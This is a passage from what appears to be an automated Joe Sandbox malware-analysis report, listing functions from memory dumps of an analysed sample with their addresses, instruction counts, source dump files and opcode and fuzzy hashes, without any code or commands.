                      • Instruction ID: 8f88f53164999ef818505eb75fc3b9f8a834ad91b97686b9ac093ad547aa8a72
                      • Opcode Fuzzy Hash: 9c7e6192d034e7a454ca8996136de085f8954ea25679882ff87fbb858a73d294
                      • Instruction Fuzzy Hash: 57014F71E1422D8EDB94DF55C4A17FDB2B0BF06300F4110BAD24DE6186DABD5A44EF50
                      Function 00007FFD34481BCD Relevance: .0, Instructions: 41COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 607e295a01c56dd04e2ccdc8322c6259c424fcdbfb7024b814e9516023a5c9f6
                      • Instruction ID: 37529fa540cd77b4b1921e0073d7d08b45ef9ea060e46f804b9a5ee23cc4645c
                      • Opcode Fuzzy Hash: 607e295a01c56dd04e2ccdc8322c6259c424fcdbfb7024b814e9516023a5c9f6
                      • Instruction Fuzzy Hash: BE01D63090D68E8FEB98DF2484A52BA3BA0FF56301F45007ED908C2092DB7A9450C740
                      Function 00007FFD344805D0 Relevance: .0, Instructions: 39COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 392df1d849fddb3b62a5e4799d8316f60e65d90c0967743b3ea8fbd5b595f1be
                      • Instruction ID: 3cdda98b774190da15e823b57f28c2c0c0ddbce6c7ef4a871ef6a67ae8a8d593
                      • Opcode Fuzzy Hash: 392df1d849fddb3b62a5e4799d8316f60e65d90c0967743b3ea8fbd5b595f1be
                      • Instruction Fuzzy Hash: 07F0F630A0950E8FEB94EF64D4A52FA37A4FF16304F11043BE80DC3085DA7AA450C780
                      Function 00007FFD344AFE35 Relevance: .0, Instructions: 39COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8e08f29ce605a4540f9b5805ded0fdeb73a1d1a4bd74bc4918f6ebbbc9e592b5
                      • Instruction ID: 45896a2881090479ed72c01a2538ed4becc881c7b3915bdf743fffa119c79636
                      • Opcode Fuzzy Hash: 8e08f29ce605a4540f9b5805ded0fdeb73a1d1a4bd74bc4918f6ebbbc9e592b5
                      • Instruction Fuzzy Hash: 2B01B630A1990DCFEB94EF48D894AAD77F1FF5A301F250179D00AE7295CAB9A9409B00
                      Function 00007FFD34495930 Relevance: .0, Instructions: 35COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c46518eca87ec6a4f478c5a2902a91a2b7123eefd757751d54cb965d547f789f
                      • Instruction ID: c50e946d4323aa25ec547771d9993254e7d793e2dc101f8910c72a33189a2b9b
                      • Opcode Fuzzy Hash: c46518eca87ec6a4f478c5a2902a91a2b7123eefd757751d54cb965d547f789f
                      • Instruction Fuzzy Hash: 59F0F475E0892D8FEF90EB5888957ECB7F1FB59311F50007AC50DE3255DE386841AB40
                      Function 00007FFD344826D9 Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 670d1f87fce0c78b51b460d825fc7b0fb6ef4a35734c24ac0fb760055fefcc8d
                      • Instruction ID: e3d1aa302e17f264ab33197ffd54966c26e38396b5c7c4678bd149029d74ce35
                      • Opcode Fuzzy Hash: 670d1f87fce0c78b51b460d825fc7b0fb6ef4a35734c24ac0fb760055fefcc8d
                      • Instruction Fuzzy Hash: 3CF0963490E7C98FDB9A9F24C8792A93FA0BF06300F4605BBD549C61D2DB7E9454C741
                      Function 00007FFD3448274D Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 29a54da112f1e2b4523611e9affdcf5bf7673f5a77d712e44f226151ea46699f
                      • Instruction ID: 5225e7ce165e55f7793afb44963ad37b19c5fa0f2ada0254b1821a31bbbc9230
                      • Opcode Fuzzy Hash: 29a54da112f1e2b4523611e9affdcf5bf7673f5a77d712e44f226151ea46699f
                      • Instruction Fuzzy Hash: 74F0F03190D28A8FEBA99F2088652AA3BA4BF07300F4205BEE909C20D2DB7E9440D601
                      Function 00007FFD3449C60A Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cbddf698dc9d8789ac31fa9732c130db66cc6e1c672872105267e2e864acc33
                      • Instruction ID: 89d3a0f4001bf9d02b819faad094abef3bac53edbcfa3c3ae6fb1ca3881f844d
                      • Opcode Fuzzy Hash: 6cbddf698dc9d8789ac31fa9732c130db66cc6e1c672872105267e2e864acc33
                      • Instruction Fuzzy Hash: 85F04F70E0840A9FE750EB94C4A46FDB7B5EF46304F518135D11EE228ECEBC6946AB80
                      Function 00007FFD34480F49 Relevance: .0, Instructions: 28COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c3b7830821f9f8429acc4ed438cd4af5cc9b5fae05de9ec3fc616a84b2ea9ed3
                      • Instruction ID: d474f8acae9574180e09a1cea318e3ddf8172a081418db710983997c151f986e
                      • Opcode Fuzzy Hash: c3b7830821f9f8429acc4ed438cd4af5cc9b5fae05de9ec3fc616a84b2ea9ed3
                      • Instruction Fuzzy Hash: 29F09030E1950ACBFB60EB14C8A0BBE77B0FB55305F214275D109E3286DEB869808F80
                      Function 00007FFD3449884C Relevance: .0, Instructions: 28COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b59dfbeccef33d721839943843e3a2227d9071ab99d99ad7071aef09f87aff5f
                      • Instruction ID: cb8f9f48d55b6847d73f99bc53106df244d2d306cc9cb2327e9c201e33c7a941
                      • Opcode Fuzzy Hash: b59dfbeccef33d721839943843e3a2227d9071ab99d99ad7071aef09f87aff5f
                      • Instruction Fuzzy Hash: 3EF017A1E1591C4EEBD0EB2888A57A9B3F1EB56200F1040F5C00CD2296CE342D809F00
                      Function 00007FFD344AF542 Relevance: .0, Instructions: 27COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ce76d8bd8fc82d79fe3155f6513548faba3888c5262efe792bc730fc62c6541
                      • Instruction ID: 6120e5c11c932bb0840891bb9ee0965434fc4fb707f3a8691adb4df715a4213f
                      • Opcode Fuzzy Hash: 2ce76d8bd8fc82d79fe3155f6513548faba3888c5262efe792bc730fc62c6541
                      • Instruction Fuzzy Hash: B7F0F434A0DA198ADBA0EA84C851BE9B3B0FF15304F0144B5C10DE3186CAB8AA859F81
                      Function 00007FFD34492FFD Relevance: .0, Instructions: 26COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6be922e8e42d1656fc5ea8aa36f2d31a8f305cbea7db3c449fead4c47ef7e04c
                      • Instruction ID: 181ff4192b740532e0755d2d4219a5ee330806d69301d12e4f5e750e04bcaa81
                      • Opcode Fuzzy Hash: 6be922e8e42d1656fc5ea8aa36f2d31a8f305cbea7db3c449fead4c47ef7e04c
                      • Instruction Fuzzy Hash: EAF05E71E185199BEB54EF94D8A4BAC73B1FF46301F0146BAD40DE3295DFBC69849B00
                      Function 00007FFD34481680 Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2a1a5cca1e6e06b9dbeb7d39b273728c7f151a8c036831ce9938b39de7d2662
                      • Instruction ID: 59888a21e6aa5d8ae50e058c2801dab3e69ea1b7f6d19e3fa67ca49d6e105364
                      • Opcode Fuzzy Hash: b2a1a5cca1e6e06b9dbeb7d39b273728c7f151a8c036831ce9938b39de7d2662
                      • Instruction Fuzzy Hash: E9E06520F094024AE7A4531880D463461D19F46304F7A8577F31CC71DBDBAEDCC1E200
                      Function 00007FFD3449A0C7 Relevance: .0, Instructions: 24COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7567b052ecb6d799160f6a863cf64ed2adbaf0d075b15c37a310fc4f3e05ee1
                      • Instruction ID: dd9e25acd67c5a0b0a8deb850ce2c8caec0af33658545ce78a7f155aac9611a1
                      • Opcode Fuzzy Hash: a7567b052ecb6d799160f6a863cf64ed2adbaf0d075b15c37a310fc4f3e05ee1
                      • Instruction Fuzzy Hash: FAE0ED31E4D15ACAEB248E95E4A51FCB774EF4A306F61403AD61EB2286CABC2514FF50
                      Function 00007FFD3449AEC0 Relevance: .0, Instructions: 21COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32b751049efc16b498a9cd8d843e1504efb92d612a0151c720b3f984b0931ac4
                      • Instruction ID: 7ef6bc6d2e2445bbf7727282a6c90b1d806739763f61e702f6919d4c57e54686
                      • Opcode Fuzzy Hash: 32b751049efc16b498a9cd8d843e1504efb92d612a0151c720b3f984b0931ac4
                      • Instruction Fuzzy Hash: E1E0128AACE2E63AD62272FC74737EA2F584F4323D70D42B3E1CC5C4534804245582A5
                      Function 00007FFD3449E196 Relevance: .0, Instructions: 17COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2f600601a2d6974445acb997c1188ff1c3beb06d8f3205e774784e8b26640eca
                      • Instruction ID: d919f6b70ade07c51486dc5fd7dcb963b7f45b7b5e5367daf917fa10a96c5334
                      • Opcode Fuzzy Hash: 2f600601a2d6974445acb997c1188ff1c3beb06d8f3205e774784e8b26640eca
                      • Instruction Fuzzy Hash: 7EE0B631918B198BDFA8EB04C899FA9B3B6EB64700F1001B9900DA3254CF74AA85DF81